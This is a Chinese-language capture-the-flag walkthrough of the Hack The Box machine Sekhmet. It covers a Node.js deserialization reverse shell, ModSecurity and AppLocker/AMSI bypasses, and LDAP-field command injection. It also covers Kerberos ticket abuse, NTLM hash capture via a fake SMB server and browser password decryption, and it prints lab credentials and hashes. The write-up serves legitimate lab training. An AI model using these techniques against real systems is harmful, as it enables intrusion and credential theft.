基本信息
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.10.11.179 |
80
需要加hosts:
1 | 10.10.11.179 www.windcorp.htb |
子域名扫描
继续扫描子域名发现portal:
1 | ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://www.windcorp.htb/" -H 'Host: FUZZ.windcorp.htb' -fs 153 |
portal
同样加hosts后访问:
portal
常规弱口令 admin:admin 登录,根据cookie和响应头可以知道是nodejs:
ModSecurity
简单测试可以发现存在ModSecurity:
shell
利用modsecurity ruleset bypass和nodejs rce实现rce:
- ModSecurity Vulnerability & PoC (CVE-2019-19886)
https://www.secjuice.com/modsecurity-vulnerability-cve-2019-19886/ - Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ - Node.Js-Security-Course/nodejsshell.py at master · ajinabraham/Node.Js-Security-Course
https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
1 | python2 nodejsshell.py 10.10.14.6 4444 |
得到webster用户shell:
backup.zip
zip文件无法直接破解,但能够查看里面目录结构,知道其中包括/etc/passwd文件,我们可以尝试已知明文攻击:
- Brute Force - CheatSheet - HackTricks
https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#known-plaintext-zip-attack
1 | create a zip of the passwd file |
var/lib/sss/db/cache_windcorp.htb.ldb中发现一组账号hash,破解出来密码是pantera:
1 | Ray.Duncan@WINDCORP.HTB |
ray.duncan & user flag
使用域账号ssh登录,ray.duncan可以得到webserver的root权限:
1 | ssh 'ray.duncan@windcorp.htb'@10.10.11.179 |
webserver的root得到user flag:
容器网络扫描
进一步探测容器子网,发现192.168.0.2应该是DC:
1 | for p in {1..65535}; do nc -vn 192.168.0.2 $p -w 1 -z & done 2> output.txt |
所以需要设置代理和DC通信:
1 | local |
然后设置好proxychains,即可和DC通信:
1 | proxychains4 python3 ~/Tools/impacket/examples/getST.py -dc-ip 192.168.0.2 -spn cifs/hope.windcorp.htb 'windcorp.htb/ray.duncan:pantera' |
SMB
上面已经获得了ST,使用ST访问smb:
1 | export KRB5CCNAME=ray.duncan.ccache |
LDAP
参考这个:
在受感染的容器上,转储 ldap 数据库以获取更多信息:
1 | ldapsearch -LLLY GSSAPI -H ldap://windcorp.htb -b 'DC=windcorp,DC=htb' > ldapinfo.txt |
命令注入
我们可以更改 ray.duncan 的手机号,这个字段容易被cmd注入。以以下形式构造有效负载:mobile: ;<cmd>
1 | create a mod.ldif |
检查更改并等待一段时间(2 分钟)以观察希望的请求。注意:mobile字段有字符限制(即 64)
applocker
目标正在运行applocker,我们可以制作一个 ldif 来获取 applocker 策略
1 | dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb |
通过阅读政策,我们了解到我们需要寻找一个不在例外列表中的可以写入的文件夹
参考这个:
- World-writable directories in %windir%
https://gist.github.com/mattifestation/5f9de750470c9e0e1f9c9c33f0ec3e56
1 | <FilePathRule Id="2c47f772-4d79-4493-b64b-613e17f0011c" Name="All files located in the Windows folder" Description="Allows members of the Everyone group to run applications that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow"> |
我们需要的另一件事是绕过amsi,参考:
- Powershell CLM Bypass Using Runspaces
https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/
scriptrunner
编译后继续通过ldap出发执行,得到DC上的scriptrunner shell:
1 | # upload the bypass code |
信息
运行winpeas,发现启用了ntlmv2,可以使用smbserver进行ntlm泄漏攻击:
1 | on webserver |
使用以下 ldif 触发 DC 浏览到我们的假 smbserver:
1 | dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb |
等待触发,得到hash破解出来:
1 | [*] scriptrunner::WINDCORP:aaaaaaaaaaaaaaaa:7fac7b077275dce97d19f843ee6abffd:0101000000000000002d44218c1ad901ac6dba83ddbdf08f0000000001001000580044006200480072004d0065007800020010006d00660073004f00440047005900740003001000580044006200480072004d0065007800040010006d00660073004f00440047005900740007000800002d44218c1ad90106000400020000000800300030000000000000000000000000210000848ca8512f99bcb680a900509bb131558d94dbc4f37763d4ef3f770b53d146680a001000000000000000000000000000000000000900360063006900660073002f007700650062007300650072007600650072002e00770069006e00640063006f00720070002e006800740062000000000000000000 |
bob.wood
上面得到的密码也是bob.wood的密码,使用powershell以他的身份执行命令:
1 | $SecPassword = ConvertTo-SecureString '!@p%i&J#iNNo1T2' -AsPlainText -Force |
上传sharphound,再次采集数据,貌似bob.wood是IT的成员,对DC有PSRemote权限。但是,我们需要成为域管理员(例如 bob.woodadm)才能获取管理员通行证。假设 bob.wood 可能使用同一台计算机作为 bob.woodadm 登录以进行管理工作是合乎逻辑的。因此,在浏览器缓存中搜索可能会找到有用的信息。
bob.woodadm凭据保存在 Edge 中,可在此处找到:C:\users\bob.wood\appdata\local\microsoft\edge\user data\default\Login Data
使用此工具解密密码:
- moonD4rk/HackBrowserData: Decrypt passwords/cookies/history/bookmarks from the browser. 一款可全平台运行的浏览器数据导出解密工具。
https://github.com/moonD4rk/HackBrowserData
1 | PS C:\windows\debug\wia> .\hbd.exe |
bob.woodADM
现在,以 bob.woodadm 身份登录并捕获根标志:
1 | $SecPassword = ConvertTo-SecureString 'smeT-Worg-wer-m024' -AsPlainText -Force |
参考资料
- ModSecurity Vulnerability & PoC (CVE-2019-19886)
https://www.secjuice.com/modsecurity-vulnerability-cve-2019-19886/ - Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ - Node.Js-Security-Course/nodejsshell.py at master · ajinabraham/Node.Js-Security-Course
https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py - Brute Force - CheatSheet - HackTricks
https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#known-plaintext-zip-attack - MS ADV190023
https://gist.github.com/tscherf/a0be193fe7bd603bbe1f511f9a00e737 - World-writable directories in %windir%
https://gist.github.com/mattifestation/5f9de750470c9e0e1f9c9c33f0ec3e56 - Powershell CLM Bypass Using Runspaces
https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/ - https://github.com/ropnop/impacket_static_binaries/releases
- moonD4rk/HackBrowserData: Decrypt passwords/cookies/history/bookmarks from the browser. 一款可全平台运行的浏览器数据导出解密工具。
https://github.com/moonD4rk/HackBrowserData - Sekhmet - HTB [Discussion] | BreachForums
https://breached.vc/Thread-Sekhmet-HTB-Discussion - HTB - Sekhmet [Insane] // MeowMeowAttack’s security.log
https://meowmeowattack.github.io/htb/sekhmet/
